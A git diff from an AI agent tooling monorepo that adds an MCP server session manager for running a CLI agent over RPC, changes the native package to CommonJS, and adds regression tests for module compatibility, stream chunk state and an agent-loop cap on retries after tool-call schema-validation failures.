+    const args: string[] = ['--mode', 'rpc'];
+    if (options.model) args.push('--model', options.model);
+    if (options.bare) args.push('--bare');
+
+    const client = new RpcClient({
+      cliPath,
+      cwd: resolvedDir,
+      args,
+    });
+
+    // Build the session shell before async operations so we can track state
+    const session: ManagedSession = {
+      sessionId: '', // filled after init
+      projectDir: resolvedDir,
+      status: 'starting',
+      client,
+      events: [],
+      pendingBlocker: null,
+      cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } },
+      startTime: Date.now(),
+    };
+
+    // Insert into map early (keyed by dir) so concurrent starts are rejected
+    this.sessions.set(resolvedDir, session);
+
+    try {
+      // Start the process with timeout
+      await Promise.race([
+        client.start(),
+        timeout(INIT_TIMEOUT_MS, `RpcClient.start() timed out after ${INIT_TIMEOUT_MS}ms`),
+      ]);
+
+      // Perform v2 init handshake
+      const initResult: RpcInitResult = await Promise.race([
+        client.init(),
+        timeout(INIT_TIMEOUT_MS, `RpcClient.init() timed out after ${INIT_TIMEOUT_MS}ms`),
+      ]) as RpcInitResult;
+
+      session.sessionId = initResult.sessionId;
+      session.status = 'running';
+
+      // Wire event tracking
+      session.unsubscribe = client.onEvent((event: SdkAgentEvent) => {
+        this.handleEvent(session, event);
+      });
+
+      // Kick off auto-mode
+      const command = options.command ?? '/gsd auto';
+      await client.prompt(command);
+
+      return session.sessionId;
+    } catch (err) {
+      session.status = 'error';
+      session.error = err instanceof Error ? err.message : String(err);
+
+      // Attempt cleanup
+      try { await client.stop(); } catch { /* swallow cleanup errors */ }
+
+      // Keep session in map so callers can inspect the error
+      throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`);
+    }
+  }
+
+  /**
+   * Look up a session by sessionId.
+   * Linear scan is fine — we expect <10 concurrent sessions.
+   */
+  getSession(sessionId: string): ManagedSession | undefined {
+    for (const session of this.sessions.values()) {
+      if (session.sessionId === sessionId) return session;
+    }
+    return undefined;
+  }
+
+  /**
+   * Look up a session by project directory (direct map lookup).
+   */
+  getSessionByDir(projectDir: string): ManagedSession | undefined {
+    return this.sessions.get(resolve(projectDir));
+  }
+
+  /**
+   * Resolve a pending blocker by sending a UI response.
+   */
+  async resolveBlocker(sessionId: string, response: string): Promise<void> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+    if (!session.pendingBlocker) throw new Error(`No pending blocker for session ${sessionId}`);
+
+    const blocker = session.pendingBlocker;
+    session.client.sendUIResponse(blocker.id, { value: response });
+    session.pendingBlocker = null;
+    if (session.status === 'blocked') {
+      session.status = 'running';
+    }
+  }
+
+  /**
+   * Cancel a running session — abort current operation then stop the process.
+   */
+  async cancelSession(sessionId: string): Promise<void> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+
+    try {
+      await session.client.abort();
+    } catch { /* may already be stopped */ }
+
+    try {
+      await session.client.stop();
+    } catch { /* swallow */ }
+
+    session.status = 'cancelled';
+    session.unsubscribe?.();
+  }
+
+  /**
+   * Build a HeadlessJsonResult-shaped object from accumulated session state.
+   */
+  getResult(sessionId: string): Record<string, unknown> {
+    const session = this.getSession(sessionId);
+    if (!session) throw new Error(`Session not found: ${sessionId}`);
+
+    const durationMs = Date.now() - session.startTime;
+
+    return {
+      sessionId: session.sessionId,
+      projectDir: session.projectDir,
+      status: session.status,
+      durationMs,
+      cost: session.cost,
+      recentEvents: session.events.slice(-10),
+      pendingBlocker: session.pendingBlocker
+        ? { id: session.pendingBlocker.id, method: session.pendingBlocker.method, message: session.pendingBlocker.message }
+        : null,
+      error: session.error ?? null,
+    };
+  }
+
+  /**
+   * Stop all active sessions and clean up resources.
+   */
+  async cleanup(): Promise<void> {
+    const stopPromises: Promise<void>[] = [];
+
+    for (const session of this.sessions.values()) {
+      session.unsubscribe?.();
+      if (session.status === 'running' || session.status === 'starting' || session.status === 'blocked') {
+        stopPromises.push(
+          session.client.stop().catch(() => { /* swallow */ })
+        );
+        session.status = 'cancelled';
+      }
+    }
+
+    await Promise.allSettled(stopPromises);
+  }
+
+  /**
+   * Resolve the GSD CLI path.
+   *
+   * 1. GSD_CLI_PATH env var (highest priority)
+   * 2. `which gsd` → resolve to the actual dist/cli.js
+   */
+  static resolveCLIPath(): string {
+    // Check env var first
+    const envPath = process.env['GSD_CLI_PATH'];
+    if (envPath) return resolve(envPath);
+
+    // Fallback: locate `gsd` via which
+    try {
+      const gsdBin = execSync('which gsd', { encoding: 'utf-8' }).trim();
+      if (gsdBin) {
+        // gsd bin is typically a symlink to dist/loader.js — return the resolved path
+        return resolve(gsdBin);
+      }
+    } catch {
+      // which failed
+    }
+
+    throw new Error(
+      'Cannot find GSD CLI. Set GSD_CLI_PATH environment variable or ensure `gsd` is in PATH.'
+    );
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private: Event Handling
+  // ---------------------------------------------------------------------------
+
+  private handleEvent(session: ManagedSession, event: SdkAgentEvent): void {
+    // Ring buffer: push and trim
+    session.events.push(event);
+    if (session.events.length > MAX_EVENTS) {
+      session.events.splice(0, session.events.length - MAX_EVENTS);
+    }
+
+    // Cost tracking (K004 — cumulative-max)
+    if (event.type === 'cost_update') {
+      const costEvent = event as unknown as RpcCostUpdateEvent;
+      session.cost.totalCost = Math.max(session.cost.totalCost, costEvent.cumulativeCost ?? 0);
+      if (costEvent.tokens) {
+        session.cost.tokens.input = Math.max(session.cost.tokens.input, costEvent.tokens.input ?? 0);
+        session.cost.tokens.output = Math.max(session.cost.tokens.output, costEvent.tokens.output ?? 0);
+        session.cost.tokens.cacheRead = Math.max(session.cost.tokens.cacheRead, costEvent.tokens.cacheRead ?? 0);
+        session.cost.tokens.cacheWrite = Math.max(session.cost.tokens.cacheWrite, costEvent.tokens.cacheWrite ?? 0);
+      }
+    }
+
+    // Terminal detection — auto-mode/step-mode stopped
+    if (isTerminalNotification(event as Record<string, unknown>)) {
+      // Check if it's a blocked stop (not truly terminal — it's a blocker)
+      if (isBlockedNotification(event as Record<string, unknown>)) {
+        session.status = 'blocked';
+        session.pendingBlocker = extractBlocker(event);
+      } else {
+        session.status = 'completed';
+        session.unsubscribe?.();
+      }
+      return;
+    }
+
+    // Blocker detection — non-fire-and-forget extension_ui_request
+    if (isBlockingUIRequest(event as Record<string, unknown>)) {
+      session.status = 'blocked';
+      session.pendingBlocker = extractBlocker(event);
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+function timeout(ms: number, message: string): Promise<never> {
+  return new Promise((_, reject) => {
+    setTimeout(() => reject(new Error(message)), ms);
+  });
+}
+
+function extractBlocker(event: SdkAgentEvent): PendingBlocker {
+  const uiEvent = event as unknown as RpcExtensionUIRequest;
+  return {
+    id: String(uiEvent.id ?? ''),
+    method: String(uiEvent.method ?? ''),
+    message: String((uiEvent as Record<string, unknown>).title ?? (uiEvent as Record<string, unknown>).message ?? ''),
+    event: uiEvent,
+  };
+}
diff --git a/packages/mcp-server/src/types.ts b/packages/mcp-server/src/types.ts
new file mode 100644
index 000000000..fa12c9f61
--- /dev/null
+++ b/packages/mcp-server/src/types.ts
@@ -0,0 +1,107 @@
+/**
+ * MCP Server types — session lifecycle and orchestration.
+ */
+
+import type { RpcClient, SdkAgentEvent, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+
+// ---------------------------------------------------------------------------
+// Session Status
+// ---------------------------------------------------------------------------
+
+export type SessionStatus = 'starting' | 'running' | 'blocked' | 'completed' | 'error' | 'cancelled';
+
+// ---------------------------------------------------------------------------
+// Managed Session
+// ---------------------------------------------------------------------------
+
+export interface ManagedSession {
+  /** Unique session ID returned from RpcClient.init() */
+  sessionId: string;
+
+  /** Absolute path to the project directory */
+  projectDir: string;
+
+  /** Current lifecycle status */
+  status: SessionStatus;
+
+  /** The RpcClient instance managing the agent process */
+  client: RpcClient;
+
+  /** Ring buffer of recent events (capped at MAX_EVENTS) */
+  events: SdkAgentEvent[];
+
+  /** Pending blocker requiring user response, if any */
+  pendingBlocker: PendingBlocker | null;
+
+  /** Cumulative cost tracking (max pattern per K004) */
+  cost: CostAccumulator;
+
+  /** Session start timestamp */
+  startTime: number;
+
+  /** Error message if status is 'error' */
+  error?: string;
+
+  /** Cleanup function to unsubscribe from events */
+  unsubscribe?: () => void;
+}
+
+// ---------------------------------------------------------------------------
+// Pending Blocker
+// ---------------------------------------------------------------------------
+
+export interface PendingBlocker {
+  /** The extension_ui_request id */
+  id: string;
+
+  /** The request method (e.g. 'select', 'confirm', 'input') */
+  method: string;
+
+  /** Human-readable message or title */
+  message: string;
+
+  /** Full event payload for inspection */
+  event: RpcExtensionUIRequest;
+}
+
+// ---------------------------------------------------------------------------
+// Cost Accumulator (K004 — cumulative-max)
+// ---------------------------------------------------------------------------
+
+export interface CostAccumulator {
+  totalCost: number;
+  tokens: {
+    input: number;
+    output: number;
+    cacheRead: number;
+    cacheWrite: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Execute Options
+// ---------------------------------------------------------------------------
+
+export interface ExecuteOptions {
+  /** Command to send after '/gsd auto' (default: none) */
+  command?: string;
+
+  /** Model ID override */
+  model?: string;
+
+  /** Run in bare mode (skip user config) */
+  bare?: boolean;
+
+  /** Path to CLI binary (overrides GSD_CLI_PATH and which resolution) */
+  cliPath?: string;
+}
+
+// ---------------------------------------------------------------------------
+// Constants
+// ---------------------------------------------------------------------------
+
+/** Maximum number of events kept in the ring buffer */
+export const MAX_EVENTS = 50;
+
+/** Timeout for RpcClient initialization (ms) */
+export const INIT_TIMEOUT_MS = 30_000;
diff --git a/packages/mcp-server/tsconfig.json b/packages/mcp-server/tsconfig.json
new file mode 100644
index 000000000..779b48aca
--- /dev/null
+++ b/packages/mcp-server/tsconfig.json
@@ -0,0 +1,24 @@
+{
+  "compilerOptions": {
+    "target": "ES2024",
+    "module": "Node16",
+    "lib": ["ES2024"],
+    "strict": true,
+    "esModuleInterop": true,
+    "skipLibCheck": true,
+    "forceConsistentCasingInFileNames": true,
+    "declaration": true,
+    "declarationMap": true,
+    "sourceMap": true,
+    "inlineSources": true,
+    "inlineSourceMap": false,
+    "moduleResolution": "Node16",
+    "resolveJsonModule": true,
+    "allowImportingTsExtensions": false,
+    "types": ["node"],
+    "outDir": "./dist",
+    "rootDir": "./src"
+  },
+  "include": ["src/**/*.ts"],
+  "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"]
+}
diff --git a/packages/native/package.json b/packages/native/package.json
index 1bb3b009d..42bc47668 100644
--- a/packages/native/package.json
+++ b/packages/native/package.json
@@ -2,7 +2,7 @@
   "name": "@gsd/native",
   "version": "0.1.0",
   "description": "Native Rust bindings for GSD \u2014 high-performance native modules via N-API",
-  "type": "module",
+  "type": "commonjs",
   "main": "./dist/index.js",
   "types": "./dist/index.d.ts",
   "scripts": {
@@ -14,75 +14,75 @@
   "exports": {
     ".": {
       "types": "./dist/index.d.ts",
-      "import": "./dist/index.js"
+      "default": "./dist/index.js"
     },
     "./grep": {
       "types": "./dist/grep/index.d.ts",
-      "import": "./dist/grep/index.js"
+      "default": "./dist/grep/index.js"
     },
     "./ps": {
       "types": "./dist/ps/index.d.ts",
-      "import": "./dist/ps/index.js"
+      "default": "./dist/ps/index.js"
     },
     "./glob": {
       "types": "./dist/glob/index.d.ts",
-      "import": "./dist/glob/index.js"
+      "default": "./dist/glob/index.js"
     },
     "./clipboard": {
       "types": "./dist/clipboard/index.d.ts",
-      "import": "./dist/clipboard/index.js"
+      "default": "./dist/clipboard/index.js"
     },
     "./ast": {
       "types": "./dist/ast/index.d.ts",
-      "import": "./dist/ast/index.js"
+      "default": "./dist/ast/index.js"
     },
     "./html": {
       "types": "./dist/html/index.d.ts",
-      "import": "./dist/html/index.js"
+      "default": "./dist/html/index.js"
     },
     "./text": {
       "types": "./dist/text/index.d.ts",
-      "import": "./dist/text/index.js"
+      "default": "./dist/text/index.js"
     },
     "./fd": {
       "types": "./dist/fd/index.d.ts",
-      "import": "./dist/fd/index.js"
+      "default": "./dist/fd/index.js"
     },
     "./image": {
       "types": "./dist/image/index.d.ts",
-      "import": "./dist/image/index.js"
+      "default": "./dist/image/index.js"
     },
     "./xxhash": {
       "types": "./dist/xxhash/index.d.ts",
-      "import": "./dist/xxhash/index.js"
+      "default": "./dist/xxhash/index.js"
     },
     "./diff": {
       "types": "./dist/diff/index.d.ts",
-      "import": "./dist/diff/index.js"
+      "default": "./dist/diff/index.js"
     },
     "./gsd-parser": {
       "types": "./dist/gsd-parser/index.d.ts",
-      "import": "./dist/gsd-parser/index.js"
+      "default": "./dist/gsd-parser/index.js"
     },
     "./highlight": {
       "types": "./dist/highlight/index.d.ts",
-      "import": "./dist/highlight/index.js"
+      "default": "./dist/highlight/index.js"
     },
     "./json-parse": {
       "types": "./dist/json-parse/index.d.ts",
-      "import": "./dist/json-parse/index.js"
+      "default": "./dist/json-parse/index.js"
     },
     "./stream-process": {
       "types": "./dist/stream-process/index.d.ts",
-      "import": "./dist/stream-process/index.js"
+      "default": "./dist/stream-process/index.js"
     },
     "./truncate": {
       "types": "./dist/truncate/index.d.ts",
-      "import": "./dist/truncate/index.js"
+      "default": "./dist/truncate/index.js"
     },
     "./ttsr": {
       "types": "./dist/ttsr/index.d.ts",
-      "import": "./dist/ttsr/index.js"
+      "default": "./dist/ttsr/index.js"
     }
   },
   "files": [
diff --git a/packages/native/src/__tests__/module-compat.test.mjs b/packages/native/src/__tests__/module-compat.test.mjs
new file mode 100644
index 000000000..949fd16d3
--- /dev/null
+++ b/packages/native/src/__tests__/module-compat.test.mjs
@@ -0,0 +1,91 @@
+/**
+ * Tests that the @gsd/native package.json is correctly configured
+ * for Node.js module resolution (ESM/CJS compatibility).
+ *
+ * Regression test for #2861: "type": "module" + "import"-only export
+ * conditions caused crashes on Node.js v24 when the parent package also
+ * declared "type": "module" and strict ESM resolution was enforced.
+ */
+
+import { test, describe } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import * as path from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = path.dirname(fileURLToPath(import.meta.url));
+const pkgPath = path.resolve(__dirname, "..", "..", "package.json");
+const pkg = JSON.parse(readFileSync(pkgPath, "utf8"));
+
+describe("@gsd/native module compatibility (#2861)", () => {
+  test("package.json must not declare type: module (compiled output is CJS-compatible)", () => {
+    // The compiled output uses createRequire() to load .node addons.
+    // Declaring "type": "module" forces Node.js to treat .js files as ESM,
+    // but the package needs "type": "commonjs" to override the parent
+    // package's "type": "module" and ensure correct CJS semantics.
+    assert.notEqual(
+      pkg.type,
+      "module",
+      'package.json must not set "type": "module" — this causes crashes on Node.js v24 ' +
+        "when the parent package also declares ESM (see #2861)",
+    );
+  });
+
+  test("package.json should explicitly declare type: commonjs", () => {
+    // When installed as a dependency under a parent with "type": "module"
+    // (e.g. gsd-pi), an absent "type" field would inherit the parent's
+    // ESM setting. Explicit "commonjs" overrides this.
+    assert.equal(
+      pkg.type,
+      "commonjs",
+      'package.json must explicitly set "type": "commonjs" to override ' +
+        "the parent package's ESM declaration",
+    );
+  });
+
+  test("all export conditions must use 'default' (not 'import'-only)", () => {
+    // The "import" condition key restricts resolution to ESM import
+    // statements only. Using "default" ensures the export works for both
+    // require() and import, which is essential for a CJS package that may
+    // be consumed from ESM code via Node's CJS interop.
+    const exportsMap = pkg.exports;
+    assert.ok(exportsMap, "package.json must have an exports map");
+
+    for (const [subpath, conditions] of Object.entries(exportsMap)) {
+      assert.ok(
+        !conditions.import || conditions.default,
+        `exports["${subpath}"] uses "import" condition without "default" — ` +
+          `this breaks CJS consumers and Node.js v24 strict resolution`,
+      );
+    }
+  });
+
+  test("native.ts source must not use bare import.meta.url (parse-time error in CJS)", () => {
+    // When compiled to CJS, import.meta is a *parse-time* syntax error --
+    // typeof guards don't help because Node rejects the syntax before
+    // executing any code.  The source must wrap import.meta access in
+    // an indirect eval so the CJS parser never sees the bare syntax.
+    const nativeSrc = readFileSync(
+      path.resolve(__dirname, "..", "native.ts"),
+      "utf8",
+    );
+
+    // Bare import.meta.url (NOT wrapped) would crash at parse time in CJS.
+    // These regexes match direct usage like fileURLToPath(import.meta.url)
+    // and createRequire(import.meta.url), but NOT indirect patterns that
+    // hide import.meta from the CJS parser.
+    const hasBareImportMetaDirname = /path\.dirname\(.*fileURLToPath\(import\.meta\.url\)\)/.test(nativeSrc);
+    const hasBareImportMetaRequire = /createRequire\(import\.meta\.url\)/.test(nativeSrc);
+
+    assert.ok(
+      !hasBareImportMetaDirname,
+      "native.ts must not use bare import.meta.url in fileURLToPath() -- " +
+        "this is a parse-time syntax error in CJS; use indirect eval",
+    );
+    assert.ok(
+      !hasBareImportMetaRequire,
+      "native.ts must not use bare import.meta.url in createRequire() -- " +
+        "this is a parse-time syntax error in CJS; use indirect eval",
+    );
+  });
+});
diff --git a/packages/native/src/__tests__/stream-process.test.mjs b/packages/native/src/__tests__/stream-process.test.mjs
new file mode 100644
index 000000000..224f0bffa
--- /dev/null
+++ b/packages/native/src/__tests__/stream-process.test.mjs
@@ -0,0 +1,34 @@
+import { test, describe } from "node:test";
+import assert from "node:assert/strict";
+import { processStreamChunk } from "../stream-process/index.ts";
+
+describe("processStreamChunk", () => {
+  test("processes a single chunk without state", () => {
+    const result = processStreamChunk(Buffer.from("hello world\n"));
+    assert.equal(result.text, "hello world\n");
+    assert.ok(Array.isArray(result.state.utf8Pending));
+    assert.ok(Array.isArray(result.state.ansiPending));
+  });
+
+  test("processes multiple chunks passing state between calls", () => {
+    const result1 = processStreamChunk(Buffer.from("first\n"));
+    assert.equal(result1.text, "first\n");
+
+    // This was the crash: passing state back caused
+    // "Given napi value is not an array on StreamState.utf8Pending"
+    // when state arrays were wrapped in Buffer.from() instead of Array.from()
+    const result2 = processStreamChunk(Buffer.from("second\n"), result1.state);
+    assert.equal(result2.text, "second\n");
+
+    const result3 = processStreamChunk(Buffer.from("third\n"), result2.state);
+    assert.equal(result3.text, "third\n");
+  });
+
+  test("state fields are plain arrays, not Buffers", () => {
+    const result = processStreamChunk(Buffer.from("test\n"));
+    assert.ok(Array.isArray(result.state.utf8Pending), "utf8Pending should be a plain array");
+    assert.ok(Array.isArray(result.state.ansiPending), "ansiPending should be a plain array");
+    assert.ok(!(result.state.utf8Pending instanceof Buffer), "utf8Pending should not be a Buffer");
+    assert.ok(!(result.state.ansiPending instanceof Buffer), "ansiPending should not be a Buffer");
+  });
+});
diff --git a/packages/native/src/native.ts b/packages/native/src/native.ts
index b310cef28..05d4288b1 100644
--- a/packages/native/src/native.ts
+++ b/packages/native/src/native.ts
@@ -8,14 +8,15 @@
  *   3. native/addon/gsd_engine.dev.node (local debug build)
  */
 
-import { createRequire } from "node:module";
 import * as path from "node:path";
-import { fileURLToPath } from "node:url";
 
-const __dirname = path.dirname(fileURLToPath(import.meta.url));
-const require = createRequire(import.meta.url);
+// __dirname and require are available in both execution contexts:
+//   - CJS (production build via tsc): provided natively by Node
+//   - ESM (CI test loader): injected by the dist-redirect.mjs preamble
+const _dirname = __dirname;
+const _require = require;
 
-const addonDir = path.resolve(__dirname, "..", "..", "..", "native", "addon");
+const addonDir = path.resolve(_dirname, "..", "..", "..", "native", "addon");
 const platformTag = `${process.platform}-${process.arch}`;
 
 /** Map Node.js platform/arch to the npm package suffix */
@@ -36,7 +37,7 @@ function loadNative(): Record<string, unknown> {
   const packageSuffix = platformPackageMap[platformTag];
   if (packageSuffix) {
     try {
-      _loadedSuccessfully = true; return require(`@gsd-build/engine-${packageSuffix}`) as Record<string, unknown>;
+      _loadedSuccessfully = true; return _require(`@gsd-build/engine-${packageSuffix}`) as Record<string, unknown>;
     } catch (err) {
       const message = err instanceof Error ? err.message : String(err);
       errors.push(`@gsd-build/engine-${packageSuffix}: ${message}`);
@@ -46,7 +47,7 @@ function loadNative(): Record<string, unknown> {
   // 2. Try local release build (native/addon/gsd_engine.{platform}.node)
   const releasePath = path.join(addonDir, `gsd_engine.${platformTag}.node`);
   try {
-    _loadedSuccessfully = true; return require(releasePath) as Record<string, unknown>;
+    _loadedSuccessfully = true; return _require(releasePath) as Record<string, unknown>;
   } catch (err) {
     const message = err instanceof Error ? err.message : String(err);
     errors.push(`${releasePath}: ${message}`);
@@ -55,7 +56,7 @@ function loadNative(): Record<string, unknown> {
   // 3. Try local dev build (native/addon/gsd_engine.dev.node)
   const devPath = path.join(addonDir, "gsd_engine.dev.node");
   try {
-    _loadedSuccessfully = true; return require(devPath) as Record<string, unknown>;
+    _loadedSuccessfully = true; return _require(devPath) as Record<string, unknown>;
   } catch (err) {
     const message = err instanceof Error ? err.message : String(err);
     errors.push(`${devPath}: ${message}`);
diff --git a/packages/native/src/stream-process/index.ts b/packages/native/src/stream-process/index.ts
index 5fa3c2ab9..4a622b144 100644
--- a/packages/native/src/stream-process/index.ts
+++ b/packages/native/src/stream-process/index.ts
@@ -33,8 +33,8 @@ export function processStreamChunk(
   // Convert StreamState arrays to the format napi expects (Vec<u8>)
   const napiState = state
     ? {
-        utf8Pending: Buffer.from(state.utf8Pending),
-        ansiPending: Buffer.from(state.ansiPending),
+        utf8Pending: Array.from(state.utf8Pending),
+        ansiPending: Array.from(state.ansiPending),
       }
     : undefined;
 
diff --git a/packages/pi-agent-core/src/agent-loop.test.ts b/packages/pi-agent-core/src/agent-loop.test.ts
new file mode 100644
index 000000000..9eda6af35
--- /dev/null
+++ b/packages/pi-agent-core/src/agent-loop.test.ts
@@ -0,0 +1,357 @@
+// agent-loop tests
+// Covers: pauseTurn handling (#2869), schema overload retry cap (#2783)
+
+import { describe, it, mock } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+import { Type } from "@sinclair/typebox";
+import { agentLoop, MAX_CONSECUTIVE_VALIDATION_FAILURES } from "./agent-loop.js";
+import type { AgentContext, AgentLoopConfig, AgentTool, AgentEvent, AgentMessage } from "./types.js";
+import { AssistantMessageEventStream, EventStream } from "@gsd/pi-ai";
+import type { AssistantMessage, AssistantMessageEvent, Model } from "@gsd/pi-ai";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+describe("agent-loop — pauseTurn handling (#2869)", () => {
+	it("sets hasMoreToolCalls when stopReason is pauseTurn", () => {
+		const source = readFileSync(join(__dirname, "agent-loop.ts"), "utf-8");
+
+		// The agent loop must treat pauseTurn as a reason to continue the inner
+		// loop, just like toolUse. This prevents incomplete server_tool_use blocks
+		// from being saved to history, which would cause a 400 on the next request.
+		assert.match(
+			source,
+			/pauseTurn/,
+			"agent-loop.ts must handle the pauseTurn stop reason",
+		);
+
+		// Verify it sets hasMoreToolCalls = true for pauseTurn
+		assert.match(
+			source,
+			/stopReason\s*===?\s*["']pauseTurn["']/,
+			'agent-loop.ts must check for stopReason === "pauseTurn"',
+		);
+	});
+
+	it("pauseTurn is in the StopReason union type", () => {
+		// Read the pi-ai types to ensure pauseTurn is a valid StopReason
+		const typesPath = join(__dirname, "..", "..", "pi-ai", "src", "types.ts");
+		const typesSource = readFileSync(typesPath, "utf-8");
+		assert.match(
+			typesSource,
+			/["']pauseTurn["']/,
+			'StopReason type must include "pauseTurn"',
+		);
+	});
+});
+
+/**
+ * Regression tests for #2783: Stuck-loop on execute-task — tool-call schema
+ * overload causes unbounded retry + budget burn.
+ *
+ * When the LLM repeatedly emits tool calls with arguments that fail schema
+ * validation, the agent loop retries indefinitely. Each failed validation
+ * returns an error tool result, the LLM retries with the same broken args,
+ * and the cycle never breaks — burning budget with no progress.
+ *
+ * The fix caps consecutive validation failures per turn at
+ * MAX_CONSECUTIVE_VALIDATION_FAILURES (default 3). Once the cap is hit, the
+ * loop injects a synthetic stop so the agent terminates cleanly instead of
+ * spinning forever.
+ */
+
+// ─── Helpers ──────────────────────────────────────────────────────────────────
+
+const TEST_MODEL: Model<"anthropic-messages"> = {
+	id: "claude-test",
+	name: "Test Model",
+	api: "anthropic-messages",
+	provider: "anthropic",
+	contextWindow: 200_000,
+	maxOutput: 4096,
+	supportsImages: false,
+	supportsPromptCache: false,
+	thinkingLevel: undefined,
+};
+
+function makeToolWithSchema(): AgentTool<any> {
+	return {
+		name: "write_file",
+		label: "Write File",
+		description: "Write content to a file",
+		parameters: Type.Object({
+			path: Type.String(),
+			content: Type.String(),
+		}),
+		execute: async () => ({
+			content: [{ type: "text" as const, text: "done" }],
+			details: {},
+		}),
+	};
+}
+
+/**
+ * Creates a mock streamFn that returns assistant messages from a queue.
+ * Each call pops the next message. The messages simulate the LLM repeatedly
+ * emitting the same tool call with broken arguments.
+ */
+function createMockStreamFn(responses: AssistantMessage[]) {
+	let callIndex = 0;
+
+	return function mockStreamFn(): AssistantMessageEventStream {
+		const message = responses[callIndex] ?? responses[responses.length - 1];
+		callIndex++;
+
+		const stream = new AssistantMessageEventStream();
+		// Simulate async delivery
+		queueMicrotask(() => {
+			stream.push({ type: "start", partial: message });
+			stream.push({ type: "done", message });
+			stream.end(message);
+		});
+		return stream;
+	};
+}
+
+function makeAssistantMessage(overrides: Partial<AssistantMessage> = {}): AssistantMessage {
+	return {
+		role: "assistant",
+		content: [],
+		api: "anthropic-messages",
+		provider: "anthropic",
+		model: "claude-test",
+		usage: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0, totalTokens: 150, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } },
+		stopReason: "stop",
+		timestamp: Date.now(),
+		...overrides,
+	};
+}
+
+function makeToolCallMessage(toolCallArgs: Record<string, unknown>): AssistantMessage {
+	return makeAssistantMessage({
+		content: [
+			{
+				type: "toolCall",
+				id: `tc_${Date.now()}_${Math.random()}`,
+				name: "write_file",
+				arguments: toolCallArgs,
+			},
+		],
+		stopReason: "toolUse",
+	});
+}
+
+function collectEvents(stream: EventStream<AgentEvent, AgentMessage[]>): Promise<AgentEvent[]> {
+	return new Promise(async (resolve) => {
+		const events: AgentEvent[] = [];
+		for await (const event of stream) {
+			events.push(event);
+		}
+		resolve(events);
+	});
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────────
+
+describe("agent-loop — schema overload retry cap (#2783)", () => {
+
+	it("terminates after MAX_CONSECUTIVE_VALIDATION_FAILURES consecutive schema failures", async () => {
+		const tool = makeToolWithSchema();
+
+		// LLM keeps sending tool calls with invalid args (missing required 'content' field)
+		const badToolCall = makeToolCallMessage({ path: "/tmp/test" }); // missing 'content'
+		const finalStop = makeAssistantMessage({ content: [{ type: "text", text: "I give up." }], stopReason: "stop" });
+
+		// Create enough bad responses to exceed the cap, plus a final stop
+		const responses: AssistantMessage[] = [];
+		for (let i = 0; i < MAX_CONSECUTIVE_VALIDATION_FAILURES + 5; i++) {
+			responses.push(badToolCall);
+		}
+		responses.push(finalStop);
+
+		const mockStream = createMockStreamFn(responses);
+
+		const context: AgentContext = {
+			systemPrompt: "You are a test agent.",
+			messages: [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }],
+			tools: [tool],
+		};
+
+		const config: AgentLoopConfig = {
+			model: TEST_MODEL,
+			convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"),
+			toolExecution: "sequential",
+		};
+
+		const stream = agentLoop(
+			[{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }],
+			context,
+			config,
+			undefined,
+			mockStream as any,
+		);
+
+		const events = await collectEvents(stream);
+
+		// Must have terminated (agent_end event present)
+		const agentEnd = events.find((e) => e.type === "agent_end");
+		assert.ok(agentEnd, "agent loop must emit agent_end after hitting retry cap");
+
+		// Count how many turns had validation errors (tool_execution_end with isError: true)
+		const toolErrors = events.filter(
+			(e) => e.type === "tool_execution_end" && e.isError === true,
+		);
+
+		// Must not exceed the cap
+		assert.ok(
+			toolErrors.length <= MAX_CONSECUTIVE_VALIDATION_FAILURES,
+			`Expected at most ${MAX_CONSECUTIVE_VALIDATION_FAILURES} validation error tool results, got ${toolErrors.length}`,
+		);
+	});
+
+	it("resets the failure counter when a tool call succeeds", async () => {
+		const tool = makeToolWithSchema();
+
+		// Pattern: 2 failures, 1 success, 2 failures, 1 success, then stop
+		const badCall = makeToolCallMessage({ path: "/tmp/test" }); // missing 'content'
+		const goodCall = makeToolCallMessage({ path: "/tmp/test", content: "hello" });
+		const finalStop = makeAssistantMessage({ content: [{ type: "text", text: "Done." }], stopReason: "stop" });
+
+		const responses = [badCall, badCall, goodCall, badCall, badCall, goodCall, finalStop];
+		const mockStream = createMockStreamFn(responses);
+
+		const context: AgentContext = {
+			systemPrompt: "You are a test agent.",
+			messages: [{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }],
+			tools: [tool],
+		};
+
+		const config: AgentLoopConfig = {
+			model: TEST_MODEL,
+			convertToLlm: (msgs) => msgs.filter((m): m is any => m.role !== "custom"),
+			toolExecution: "sequential",
+		};
+
+		const stream = agentLoop(
+			[{ role: "user", content: [{ type: "text", text: "Write a file" }], timestamp: Date.now() }],
+			context,
+			config,
+			undefined,
+			mockStream as any,
+		);
+
+		const events = await collectEvents(stream);
+
+		// Must complete successfully since failures never reached cap consecutively
+		const agentEnd = events.find((e) => e.type === "agent_end");
+		assert.ok(agentEnd, "agent loop must complete normally when failures are interspersed with successes");
+
+		// Should have processed all 6 tool-bearing turns
+		const toolExecEnds = events.filter((e) => e.type === "tool_execution_end");
+		assert.ok(toolExecEnds.length >= 4, `Expected at least 4 tool executions (2 bad + 1 good + 2 bad + 1 good), got ${toolExecEnds.length}`);
+	});
+
+	it("exports MAX_CONSECUTIVE_VALIDATION_FAILURES as a configurable constant", () => {
